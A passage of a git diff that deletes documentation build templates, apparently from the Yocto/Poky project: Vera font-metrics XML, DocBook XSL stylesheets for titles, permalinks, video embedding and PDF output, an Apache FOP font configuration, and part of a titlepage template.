w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/></cid-widths></multibyte-extras></font-metrics>
\ No newline at end of file
diff --git a/documentation/template/VeraMono.xml b/documentation/template/VeraMono.xml
deleted file mode 100644
index 3a0a86659c..0000000000
--- a/documentation/template/VeraMono.xml
+++ /dev/null
@@ -1 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?><font-metrics metrics-version="2" type="TYPE0"><font-name>BitstreamVeraSansMono-Roman</font-name><full-name>Bitstream Vera Sans Mono</full-name><family-name>Bitstream Vera Sans Mono</family-name><embed/><cap-height>729</cap-height><x-height>546</x-height><ascender>759</ascender><descender>-240</descender><bbox><left>-4</left><bottom>-235</bottom><right>605</right><top>928</top></bbox><flags>34</flags><stemv>0</stemv><italicangle>0</italicangle><subtype>TYPE0</subtype><multibyte-extras><cid-type>CIDFontType2</cid-type><default-width>0</default-width><bfranges><bf gi="3" ue="126" us="32"/><bf gi="172" ue="160" us="160"/><bf gi="163" ue="161" us="161"/><bf gi="132" ue="163" us="162"/><bf gi="189" ue="164" us="164"/><bf gi="150" ue="165" us="165"/><bf gi="231" ue="166" us="166"/><bf gi="134" ue="167" us="167"/><bf gi="142" ue="168" us="168"/><bf gi="139" ue="169" us="169"/><bf gi="157" ue="170" us="170"/><bf gi="169" ue="171" us="171"/><bf gi="164" ue="172" us="172"/><bf gi="256" ue="173" us="173"/><bf gi="138" ue="174" us="174"/><bf gi="217" ue="175" us="175"/><bf gi="131" ue="176" us="176"/><bf gi="147" ue="177" us="177"/><bf gi="241" ue="179" us="178"/><bf gi="141" ue="180" us="180"/><bf gi="151" ue="181" us="181"/><bf gi="136" ue="182" us="182"/><bf gi="195" ue="183" us="183"/><bf gi="221" ue="184" us="184"/><bf gi="240" ue="185" us="185"/><bf gi="158" ue="186" us="186"/><bf gi="170" ue="187" us="187"/><bf gi="243" ue="190" us="188"/><bf gi="162" ue="191" us="191"/><bf gi="173" ue="192" us="192"/><bf gi="201" ue="193" us="193"/><bf gi="199" ue="194" us="194"/><bf gi="174" ue="195" us="195"/><bf gi="98" ue="197" us="196"/><bf gi="144" ue="198" us="198"/><bf gi="100" ue="199" us="199"/><bf gi="203" ue="200" us="200"/><bf gi="101" ue="201" us="201"/><bf gi="200" ue="202" us="202"/><bf gi="202" ue="203" us="203"/><bf gi="207" ue="204" us="204"/><bf gi="204" ue="207" us="205"/><bf gi="232" ue="208" us="208"/><bf gi="102" ue="209" us="209"/><bf gi="210" ue="210" us="210"/><bf gi="208" ue="212" us="211"/><bf gi="175" ue="213" us="213"/><bf gi="103" ue="214" us="214"/><bf gi="239" ue="215" us="215"/><bf gi="145" ue="216" us="216"/><bf gi="213" ue="217" us="217"/><bf gi="211" ue="219" us="218"/><bf gi="104" ue="220" us="220"/><bf gi="234" ue="221" us="221"/><bf gi="236" ue="222" us="222"/><bf gi="137" ue="223" us="223"/><bf gi="106" ue="224" us="224"/><bf gi="105" ue="225" us="225"/><bf gi="107" ue="226" us="226"/><bf gi="109" ue="227" us="227"/><bf gi="108" ue="228" us="228"/><bf gi="110" ue="229" us="229"/><bf gi="160" ue="230" us="230"/><bf gi="111" ue="231" us="231"/><bf gi="113" ue="232" us="232"/><bf gi="112" ue="233" us="233"/><bf gi="114" ue="235" us="234"/><bf gi="117" ue="236" us="236"/><bf gi="116" ue="237" us="237"/><bf gi="118" ue="239" us="238"/><bf gi="233" ue="240" us="240"/><bf gi="120" ue="241" us="241"/><bf gi="122" ue="242" us="242"/><bf gi="121" ue="243" us="243"/><bf gi="123" ue="244" us="244"/><bf gi="125" ue="245" us="245"/><bf gi="124" ue="246" us="246"/><bf gi="184" ue="247" us="247"/><bf gi="161" ue="248" us="248"/><bf gi="127" ue="249" us="249"/><bf gi="126" ue="250" us="250"/><bf gi="128" ue="252" us="251"/><bf gi="235" ue="253" us="253"/><bf gi="237" ue="254" us="254"/><bf gi="186" ue="255" us="255"/><bf gi="251" ue="263" us="262"/><bf gi="253" ue="269" us="268"/><bf gi="0" ue="270" us="270"/><bf gi="0" ue="271" us="271"/><bf gi="0" ue="272" us="272"/><bf gi="255" ue="273" us="273"/><bf gi="246" ue="287" us="286"/><bf gi="248" ue="304" us="304"/><bf gi="214" ue="305" us="305"/><bf gi="225" ue="322" us="321"/><bf gi="176" ue="339" us="338"/><bf gi="249" ue="351" us="350"/><bf gi="227" ue="353" us="352"/><bf gi="187" ue="376" us="376"/><bf gi="229" ue="382" us="381"/><bf gi="166" ue="402" us="402"/><bf gi="215" ue="710" us="710"/><bf gi="224" ue="711" us="711"/><bf gi="218" ue="730" us="728"/><bf gi="223" ue="731" us="731"/><bf gi="216" ue="732" us="732"/><bf gi="222" ue="733" us="733"/><bf gi="159" ue="937" us="937"/><bf gi="155" ue="960" us="960"/><bf gi="178" ue="8212" us="8211"/><bf gi="0" ue="8213" us="8213"/><bf gi="0" ue="8214" us="8214"/><bf gi="0" ue="8215" us="8215"/><bf gi="182" ue="8217" us="8216"/><bf gi="196" ue="8218" us="8218"/><bf gi="0" ue="8219" us="8219"/><bf gi="180" ue="8221" us="8220"/><bf gi="197" ue="8222" us="8222"/><bf gi="0" ue="8223" us="8223"/><bf gi="130" ue="8224" us="8224"/><bf gi="194" ue="8225" us="8225"/><bf gi="135" ue="8226" us="8226"/><bf gi="0" ue="8227" us="8227"/><bf gi="0" ue="8228" us="8228"/><bf gi="0" ue="8229" us="8229"/><bf gi="171" ue="8230" us="8230"/><bf gi="198" ue="8240" us="8240"/><bf gi="190" ue="8250" us="8249"/><bf gi="258" ue="8364" us="8364"/><bf gi="140" ue="8482" us="8482"/><bf gi="152" ue="8706" us="8706"/><bf gi="0" ue="8707" us="8707"/><bf gi="0" ue="8708" us="8708"/><bf gi="0" ue="8709" us="8709"/><bf gi="168" ue="8710" us="8710"/><bf gi="154" ue="8719" us="8719"/><bf gi="0" ue="8720" us="8720"/><bf gi="153" ue="8721" us="8721"/><bf gi="238" ue="8722" us="8722"/><bf gi="0" ue="8723" us="8723"/><bf gi="0" ue="8724" us="8724"/><bf gi="188" ue="8725" us="8725"/><bf gi="0" ue="8726" us="8726"/><bf gi="0" ue="8727" us="8727"/><bf gi="0" ue="8728" us="8728"/><bf gi="257" ue="8729" us="8729"/><bf gi="165" ue="8730" us="8730"/><bf gi="0" ue="8731" us="8731"/><bf gi="0" ue="8732" us="8732"/><bf gi="0" ue="8733" us="8733"/><bf gi="146" ue="8734" us="8734"/><bf gi="156" ue="8747" us="8747"/><bf gi="167" ue="8776" us="8776"/><bf gi="143" ue="8800" us="8800"/><bf gi="0" ue="8801" us="8801"/><bf gi="0" ue="8802" us="8802"/><bf gi="0" ue="8803" us="8803"/><bf gi="148" ue="8805" us="8804"/><bf gi="185" ue="9674" us="9674"/><bf gi="192" ue="64258" us="64257"/><bf gi="0" ue="65535" us="65535"/></bfranges><cid-widths start-index="0"><wx w="602"/><wx w="0"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/></cid-widths></multibyte-extras></font-metrics>
\ No newline at end of file
diff --git a/documentation/template/component.title.xsl b/documentation/template/component.title.xsl
deleted file mode 100644
index ee21d59ad5..0000000000
--- a/documentation/template/component.title.xsl
+++ /dev/null
@@ -1,39 +0,0 @@
-<xsl:stylesheet version="1.0"
-  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
-  xmlns:d="http://docbook.org/ns/docbook"
-  xmlns="http://www.w3.org/1999/xhtml"
-  exclude-result-prefixes="d">
-
-  <xsl:template name="component.title">
-    <xsl:param name="node" select="."/>
-
-    <xsl:variable name="level">
-      <xsl:choose>
-        <xsl:when test="ancestor::d:section">
-          <xsl:value-of select="count(ancestor::d:section)+1"/>
-        </xsl:when>
-        <xsl:when test="ancestor::sect5">6</xsl:when>
-        <xsl:when test="ancestor::sect4">5</xsl:when>
-        <xsl:when test="ancestor::sect3">4</xsl:when>
-        <xsl:when test="ancestor::sect2">3</xsl:when>
-        <xsl:when test="ancestor::sect1">2</xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:element name="h{$level+1}" namespace="http://www.w3.org/1999/xhtml">
-      <xsl:attribute name="class">title</xsl:attribute>
-      <xsl:if test="$generate.id.attributes = 0">
-        <xsl:call-template name="anchor">
-          <xsl:with-param name="node" select="$node"/>
-          <xsl:with-param name="conditional" select="0"/>
-        </xsl:call-template>
-      </xsl:if>
-      <xsl:apply-templates select="$node" mode="object.title.markup">
-        <xsl:with-param name="allow-anchors" select="1"/>
-      </xsl:apply-templates>
-      <xsl:call-template name="permalink">
-        <xsl:with-param name="node" select="$node"/>
-      </xsl:call-template>
-    </xsl:element>
-  </xsl:template>
-</xsl:stylesheet>
diff --git a/documentation/template/division.title.xsl b/documentation/template/division.title.xsl
deleted file mode 100644
index 6c265970d5..0000000000
--- a/documentation/template/division.title.xsl
+++ /dev/null
@@ -1,24 +0,0 @@
-<xsl:stylesheet version="1.0"
-  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
-  xmlns:d="http://docbook.org/ns/docbook"
-  xmlns="http://www.w3.org/1999/xhtml"
-  exclude-result-prefixes="d">
-  
-  <xsl:template name="division.title">
-    <xsl:param name="node" select="."/>
-    
-    <h1>
-      <xsl:attribute name="class">title</xsl:attribute>
-      <xsl:call-template name="anchor">
-        <xsl:with-param name="node" select="$node"/>
-        <xsl:with-param name="conditional" select="0"/>
-      </xsl:call-template>
-      <xsl:apply-templates select="$node" mode="object.title.markup">
-        <xsl:with-param name="allow-anchors" select="1"/>
-      </xsl:apply-templates>
-      <xsl:call-template name="permalink">
-        <xsl:with-param name="node" select="$node"/>
-      </xsl:call-template>
-    </h1>
-  </xsl:template>
-</xsl:stylesheet>
diff --git a/documentation/template/embedded_video.xsl b/documentation/template/embedded_video.xsl
deleted file mode 100644
index dfb33c3441..0000000000
--- a/documentation/template/embedded_video.xsl
+++ /dev/null
@@ -1,22 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<xsl:stylesheet version="1.0"
-   xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
-   xmlns:d="http://docbook.org/ns/docbook">
-
-   <xsl:output method="html" />
-
-   <xsl:template match="/d:chapter/d:section/d:mediaobject">
-      <xsl:for-each select=".">
-         <xsl:variable name="vid_url">
-            <xsl:value-of select="./d:videoobject/d:videodata/@fileref" />
-         </xsl:variable>
-         <div style="text-align: center; margin: auto">
-            <object type="application/x-shockwave-flash" width="640" height="420" data="{$vid_url}?color2=FBE9EC&amp;showsearch=0&amp;version=3&amp;modestbranding=1&amp;fs=1">
-               <param name="movie" value="{$vid_url}?color2=FBE9EC&amp;showsearch=0&amp;version=3&amp;modestbranding=1&amp;fs=1" />
-               <param name="allowFullScreen" value="true" />
-               <param name="allowscriptaccess" value="always" />
-            </object>
-         </div>
-      </xsl:for-each>
-  </xsl:template>
-</xsl:stylesheet>
diff --git a/documentation/template/fop-config.xml b/documentation/template/fop-config.xml
deleted file mode 100644
index 09cc5ca0f5..0000000000
--- a/documentation/template/fop-config.xml
+++ /dev/null
@@ -1,58 +0,0 @@
-<fop version="1.0">
-
-  <!-- Strict user configuration -->
-  <strict-configuration>true</strict-configuration>
-
-  <!-- Strict FO validation -->
-  <strict-validation>true</strict-validation>
-
-   <!--
-    Set the baseDir so common/openedhand.svg references in plans still
-    work ok. Note, relative file references to current dir should still work.
-    -->	
-  <base>../template</base>
-  <font-base>../template</font-base>
- 
-  <!-- Source resolution in dpi (dots/pixels per inch) for determining the
-       size of pixels in SVG and bitmap images, default: 72dpi -->
-  <!-- <source-resolution>72</source-resolution> -->
-  <!-- Target resolution in dpi (dots/pixels per inch) for specifying the
-       target resolution for generated bitmaps, default: 72dpi -->
-  <!-- <target-resolution>72</target-resolution> -->
- 
-  <!-- default page-height and page-width, in case
-       value is specified as auto -->
-  <default-page-settings height="11in" width="8.26in"/> 
- 
-  <!-- <use-cache>false</use-cache> -->
- 
-  <renderers>
-    <renderer mime="application/pdf">
-      <fonts>
-        <font  metrics-file="VeraMono.xml"
-               kerning="yes" 
-               embed-url="VeraMono.ttf">
-          <font-triplet name="veramono" style="normal" weight="normal"/>
-        </font>
-
-        <font  metrics-file="VeraMoBd.xml"
-               kerning="yes" 
-               embed-url="VeraMoBd.ttf">
-          <font-triplet name="veramono" style="normal" weight="bold"/>
-        </font>
-
-        <font  metrics-file="Vera.xml"
-               kerning="yes" 
-               embed-url="Vera.ttf">
-          <font-triplet name="verasans" style="normal" weight="normal"/>
-          <font-triplet name="verasans" style="normal" weight="bold"/>
-          <font-triplet name="verasans" style="italic" weight="normal"/>
-          <font-triplet name="verasans" style="italic" weight="bold"/>
-        </font>
-        
-        <auto-detect/>
-      </fonts>
-    </renderer>
-  </renderers>
-</fop>
-
diff --git a/documentation/template/formal.object.heading.xsl b/documentation/template/formal.object.heading.xsl
deleted file mode 100644
index 1a5e697808..0000000000
--- a/documentation/template/formal.object.heading.xsl
+++ /dev/null
@@ -1,21 +0,0 @@
-<xsl:stylesheet version="1.0"
-  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
-  xmlns:d="http://docbook.org/ns/docbook"
-  xmlns="http://www.w3.org/1999/xhtml"
-  exclude-result-prefixes="d">
-  
-  <xsl:template name="formal.object.heading">
-    <xsl:param name="object" select="."/>
-    <xsl:param name="title">
-      <xsl:apply-templates select="$object" mode="object.title.markup">
-        <xsl:with-param name="allow-anchors" select="1"/>
-      </xsl:apply-templates>
-    </xsl:param>
-    <p class="title">
-      <b><xsl:copy-of select="$title"/></b>
-      <xsl:call-template name="permalink">
-        <xsl:with-param name="node" select="$object"/>
-      </xsl:call-template>
-    </p>
-  </xsl:template>
-</xsl:stylesheet>
diff --git a/documentation/template/gloss-permalinks.xsl b/documentation/template/gloss-permalinks.xsl
deleted file mode 100644
index 6bf58116f6..0000000000
--- a/documentation/template/gloss-permalinks.xsl
+++ /dev/null
@@ -1,14 +0,0 @@
-<xsl:stylesheet version="1.0"

-  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"

-  xmlns:d="http://docbook.org/ns/docbook"

-  xmlns="http://www.w3.org/1999/xhtml">

-

-  <xsl:template match="glossentry/glossterm">

-    <xsl:apply-imports/>

-    <xsl:if test="$generate.permalink != 0">

-      <xsl:call-template name="permalink">

-        <xsl:with-param name="node" select=".."/>

-      </xsl:call-template>

-    </xsl:if>

-  </xsl:template>

-</xsl:stylesheet>

diff --git a/documentation/template/permalinks.xsl b/documentation/template/permalinks.xsl
deleted file mode 100644
index d2a1c14524..0000000000
--- a/documentation/template/permalinks.xsl
+++ /dev/null
@@ -1,25 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<xsl:stylesheet version="1.0"
-  xmlns="http://www.w3.org/1999/xhtml"
-  xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
-
-  <xsl:param name="generate.permalink" select="1"/>
-  <xsl:param name="permalink.text">¶</xsl:param>
-
-  <xsl:template name="permalink">
-    <xsl:param name="node"/>
-
-    <xsl:if test="$generate.permalink != '0'">
-      <span class="permalink">
-        <a alt="Permalink" title="Permalink">
-          <xsl:attribute name="href">
-            <xsl:call-template name="href.target">
-              <xsl:with-param name="object"  select="$node"/>
-            </xsl:call-template>
-          </xsl:attribute>
-          <xsl:copy-of select="$permalink.text"/>
-        </a>
-      </span>
-    </xsl:if>
-  </xsl:template>
-</xsl:stylesheet>
diff --git a/documentation/template/poky-db-pdf.xsl b/documentation/template/poky-db-pdf.xsl
deleted file mode 100644
index f8a3df103d..0000000000
--- a/documentation/template/poky-db-pdf.xsl
+++ /dev/null
@@ -1,64 +0,0 @@
-<?xml version='1.0'?>
-<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns="http://www.w3.org/1999/xhtml" xmlns:fo="http://www.w3.org/1999/XSL/Format" version="1.0">
-
-  <xsl:import href="http://docbook.sourceforge.net/release/xsl/current/fo/docbook.xsl" />
-
-  <!-- check project-plan.sh for how this is generated, needed to tweak
-       the cover page
-    -->
-  <xsl:include href="/tmp/titlepage.xsl"/>
-
-  <!-- To force a page break in document, i.e per section add a
-      <?hard-pagebreak?> tag.
-  -->
- <xsl:template match="processing-instruction('hard-pagebreak')">
-   <fo:block break-before='page' />
- </xsl:template>
-
-  <!--Fix for defualt indent getting TOC all wierd..
-      See http://sources.redhat.com/ml/docbook-apps/2005-q1/msg00455.html
-      FIXME: must be a better fix
-    -->
-  <xsl:param name="body.start.indent" select="'0'"/>
-  <!--<xsl:param name="title.margin.left" select="'0'"/>-->
-
-  <!-- stop long-ish header titles getting wrapped -->
-  <xsl:param name="header.column.widths">1 10 1</xsl:param>
-
-  <!-- customise headers and footers a little -->
-
-  <xsl:template name="head.sep.rule">
-   <xsl:if test="$header.rule != 0">
-     <xsl:attribute name="border-bottom-width">0.5pt</xsl:attribute>
-     <xsl:attribute name="border-bottom-style">solid</xsl:attribute>
-     <xsl:attribute name="border-bottom-color">#999999</xsl:attribute>
-   </xsl:if>
-  </xsl:template>
-
-  <xsl:template name="foot.sep.rule">
-    <xsl:if test="$footer.rule != 0">
-     <xsl:attribute name="border-top-width">0.5pt</xsl:attribute>
-     <xsl:attribute name="border-top-style">solid</xsl:attribute>
-     <xsl:attribute name="border-top-color">#999999</xsl:attribute>
-    </xsl:if>
-  </xsl:template>
-
-  <xsl:attribute-set name="header.content.properties">
-    <xsl:attribute name="color">#999999</xsl:attribute>
-  </xsl:attribute-set>
-
-  <xsl:attribute-set name="footer.content.properties">
-    <xsl:attribute name="color">#999999</xsl:attribute>
-  </xsl:attribute-set>
-
-
-  <!-- general settings -->
-
-  <xsl:param name="fop1.extensions" select="1"></xsl:param>
-  <xsl:param name="paper.type" select="'A4'"></xsl:param>
-  <xsl:param name="section.autolabel" select="1"></xsl:param>
-  <xsl:param name="body.font.family" select="'verasans'"></xsl:param>
-  <xsl:param name="title.font.family" select="'verasans'"></xsl:param>
-  <xsl:param name="monospace.font.family" select="'veramono'"></xsl:param>
-
-</xsl:stylesheet>
diff --git a/documentation/template/qa-code-permalinks.xsl b/documentation/template/qa-code-permalinks.xsl
deleted file mode 100644
index a309095c60..0000000000
--- a/documentation/template/qa-code-permalinks.xsl
+++ /dev/null
@@ -1,23 +0,0 @@
-<!--

-This XSL sheet enables creation of permalinks for <para><code>

-constructs.  Right now, this construct occurs only in the ref-manual

-book's qa issues and warnings chapter.  However, if the construct

-were to appear anywhere in that ref-manual, a permalink would be

-generated.  I don't foresee any <para><code> constructs being used

-in the future but if they are then a permalink with a generically

-numbered permalink would be generated.

--->

-<xsl:stylesheet version="1.0"

-  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"

-  xmlns:d="http://docbook.org/ns/docbook"

-  xmlns="http://www.w3.org/1999/xhtml">

-

-  <xsl:template match="para/code">

-    <xsl:apply-imports/>

-    <xsl:if test="$generate.permalink != 0">

-      <xsl:call-template name="permalink">

-        <xsl:with-param name="node" select=".."/>

-      </xsl:call-template>

-    </xsl:if>

-  </xsl:template>

-</xsl:stylesheet>

diff --git a/documentation/template/section.title.xsl b/documentation/template/section.title.xsl
deleted file mode 100644
index 5c6ff9a96e..0000000000
--- a/documentation/template/section.title.xsl
+++ /dev/null
@@ -1,55 +0,0 @@
-<xsl:stylesheet version="1.0"
-  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
-  xmlns:d="http://docbook.org/ns/docbook"
-  xmlns="http://www.w3.org/1999/xhtml" exclude-result-prefixes="d">
-
-  <xsl:template name="section.title">
-    <xsl:variable name="section"
-      select="(ancestor::section |
-               ancestor::simplesect|
-               ancestor::sect1|
-               ancestor::sect2|
-               ancestor::sect3|
-               ancestor::sect4|
-               ancestor::sect5)[last()]"/>
-
-    <xsl:variable name="renderas">
-      <xsl:choose>
-        <xsl:when test="$section/@renderas = 'sect1'">1</xsl:when>
-        <xsl:when test="$section/@renderas = 'sect2'">2</xsl:when>
-        <xsl:when test="$section/@renderas = 'sect3'">3</xsl:when>
-        <xsl:when test="$section/@renderas = 'sect4'">4</xsl:when>
-        <xsl:when test="$section/@renderas = 'sect5'">5</xsl:when>
-        <xsl:otherwise><xsl:value-of select="''"/></xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-
-    <xsl:variable name="level">
-      <xsl:choose>
-        <xsl:when test="$renderas != ''">
-          <xsl:value-of select="$renderas"/>
-        </xsl:when>
-        <xsl:otherwise>
-          <xsl:call-template name="section.level">
-            <xsl:with-param name="node" select="$section"/>
-          </xsl:call-template>
-        </xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-
-    <xsl:call-template name="section.heading">
-      <xsl:with-param name="section" select="$section"/>
-      <xsl:with-param name="level" select="$level"/>
-      <xsl:with-param name="title">
-        <xsl:apply-templates select="$section" mode="object.title.markup">
-          <xsl:with-param name="allow-anchors" select="1"/>
-        </xsl:apply-templates>
-        <xsl:if test="$level &gt; 0">
-          <xsl:call-template name="permalink">
-            <xsl:with-param name="node" select="$section"/>
-          </xsl:call-template>
-        </xsl:if>
-      </xsl:with-param>
-    </xsl:call-template>
-  </xsl:template>
-</xsl:stylesheet>
diff --git a/documentation/template/titlepage.templates.xml b/documentation/template/titlepage.templates.xml
deleted file mode 100644
index f53f147002..0000000000
--- a/documentation/template/titlepage.templates.xml
+++ /dev/null
@@ -1,1227 +0,0 @@
-<!DOCTYPE t:templates [
-<!ENTITY hsize0 "10pt">
-<!ENTITY hsize1 "12pt">
-<!ENTITY hsize2 "14.4pt">
-<!ENTITY hsize3 "17.28pt">
-<!ENTITY hsize4 "20.736pt">
-<!ENTITY hsize5 "24.8832pt">
-<!ENTITY hsize0space "7.5pt"> <!-- 0.75 * hsize0 -->
-<!ENTITY hsize1space "9pt"> <!-- 0.75 * hsize1 -->
-<!ENTITY hsize2space "10.8pt"> <!-- 0.75 * hsize2 -->
-<!ENTITY hsize3space "12.96pt"> <!-- 0.75 * hsize3 -->
-<!ENTITY hsize4space "15.552pt"> <!-- 0.75 * hsize4 -->
-<!ENTITY hsize5space "18.6624pt"> <!-- 0.75 * hsize5 -->
-]>
-<t:templates xmlns:t="http://nwalsh.com/docbook/xsl/template/1.0"
-	     xmlns:param="http://nwalsh.com/docbook/xsl/template/1.0/param"
-             xmlns:fo="http://www.w3.org/1999/XSL/Format"
-             xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
-
-<!-- ********************************************************************
-     $Id: titlepage.templates.xml,v 1.23 2003/12/16 00:30:49 bobstayton Exp $
-     ********************************************************************
-
-     This file is part of the DocBook XSL Stylesheet distribution.
-     See ../README or http://docbook.sf.net/ for copyright
-     and other information.
-
-     ******************************************************************** -->
-
-<!-- ==================================================================== -->
-
-<t:titlepage t:element="article" t:wrapper="fo:block"
-             font-family="{$title.fontset}">
-
-  <t:titlepage-content t:side="recto"
-             text-align="center">
-
-    <mediaobject/>	     
-
-    <title t:named-template="component.title"
-	   param:node="ancestor-or-self::article[1]"
-	   keep-with-next="always"
-	   font-size="&hsize5;"
-	   font-weight="bold"/>
-
-    <subtitle param:node="ancestor-or-self::article[1]"
-	   keep-with-next="always"
-	   font-size="&hsize3;"
-	   font-weight="bold"
-       space-after="0.8em"/>
-
-    <corpauthor space-before="0.5em"
-                font-size="&hsize3;"/>
-    <authorgroup space-before="0.5em"
-                 font-size="&hsize2;"/>
-    <author space-before="0.5em"
-            font-size="&hsize2;" 
-            space-after="0.8em"/>
-
-    <email font-size="&hsize2;"/>
-
-    <othercredit space-before="0.5em"/>
-    <releaseinfo space-before="0.5em"/>
-    <copyright space-before="0.5em"/>
